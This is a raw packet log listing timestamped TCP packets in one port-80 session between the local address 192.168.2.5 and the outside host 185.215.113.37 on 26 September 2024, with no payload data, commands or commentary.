Sep 26, 2024 21:14:13.849184990 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.849199057 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.849211931 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896352053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896401882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896415949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896527052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896547079 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896562099 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896578074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896594048 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896598101 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896598101 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896599054 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896599054 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896599054 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896629095 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896629095 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896703959 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896718979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896745920 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896759987 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896761894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896778107 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896804094 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896820068 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896914005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896928072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896943092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896956921 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896956921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896972895 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.896974087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.896991968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897011995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897120953 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897135019 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897162914 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897187948 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897190094 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897237062 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897284985 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897300005 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897314072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897325993 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897327900 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897336960 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897341013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897356033 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897357941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897368908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897372007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897383928 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897388935 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897398949 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897403955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897416115 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897420883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897433996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897452116 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897469044 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897675991 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897700071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897715092 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897717953 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897730112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897738934 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897753954 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897761106 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897761106 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.897770882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.897813082 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898010015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898025036 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898039103 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898052931 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898053885 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898070097 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898077965 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898092031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898102045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898124933 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898134947 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898303032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898318052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898333073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898343086 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898349047 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898361921 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898380041 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898395061 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898592949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898607016 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898621082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898634911 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898638010 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898644924 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898654938 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898662090 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898672104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898679972 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898688078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898701906 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898704052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898713112 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898721933 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898730040 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898739100 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898751020 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898753881 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898762941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898770094 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.898780107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898796082 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898811102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.898971081 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899013042 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899111986 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899127960 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899142027 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899154902 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899161100 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899166107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899169922 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899175882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899184942 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899190903 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899203062 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899208069 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899224043 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899234056 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899239063 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899254084 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899254084 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899271965 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899288893 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899580002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899596930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.899624109 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.899641991 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937577963 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937592983 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937608004 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937663078 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937681913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937683105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937700033 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937716007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937728882 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937731028 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937740088 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937762022 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937772989 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937854052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937896967 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.937958956 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937973976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.937988997 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938000917 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938004971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938014984 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938020945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938035011 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938049078 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938066006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938219070 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938234091 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938261986 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938281059 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938324928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938340902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938369036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938385010 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938462973 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938484907 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938499928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938503027 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938515902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938527107 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938532114 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938541889 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938549042 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938555002 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938572884 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938591957 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938843966 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938860893 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938882113 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.938899994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938920975 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.938994884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939007998 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939023018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939034939 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939039946 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939069033 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939069033 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939081907 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939244986 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939260006 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939274073 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939287901 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939292908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939304113 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939311028 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939320087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939336061 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939338923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939352989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939363003 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939394951 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939718008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939733982 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939748049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939762115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939775944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939776897 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939793110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939805984 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939809084 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.939821959 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.939850092 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988565922 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988590002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988605976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988641024 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988656998 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988672018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988687038 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988688946 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988688946 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988723993 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988862038 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988866091 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988887072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988902092 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988926888 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.988975048 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.988991976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989006042 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989017963 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989032030 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989048004 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989226103 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989242077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989257097 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989265919 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989272118 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989283085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989286900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989298105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989303112 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989314079 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989317894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989331961 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989347935 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989361048 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989541054 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989554882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989574909 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989587069 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989587069 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989602089 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989614964 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989628077 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989721060 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989737034 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989751101 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989761114 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989778996 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989790916 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.989938021 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989953041 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989979982 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.989994049 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990000963 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990010977 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990024090 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990025043 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990040064 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990051985 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990056992 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990081072 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990092039 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990281105 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990323067 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990391970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990413904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990427971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990436077 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990443945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990447998 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990466118 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990470886 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990483046 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990485907 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990500927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990513086 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990524054 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990539074 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990884066 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990897894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990911007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990925074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990928888 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990940094 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990947962 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990957022 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990971088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990977049 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.990984917 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.990987062 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991000891 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991013050 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991018057 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991028070 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991044044 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991060972 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991400957 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991417885 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991431952 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991442919 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991455078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991456032 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991475105 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991502047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991663933 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991677999 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991692066 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991703987 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:13.991705894 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991733074 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:13.991754055 CEST	49705	80	192.168.2.5	185.215.113.37
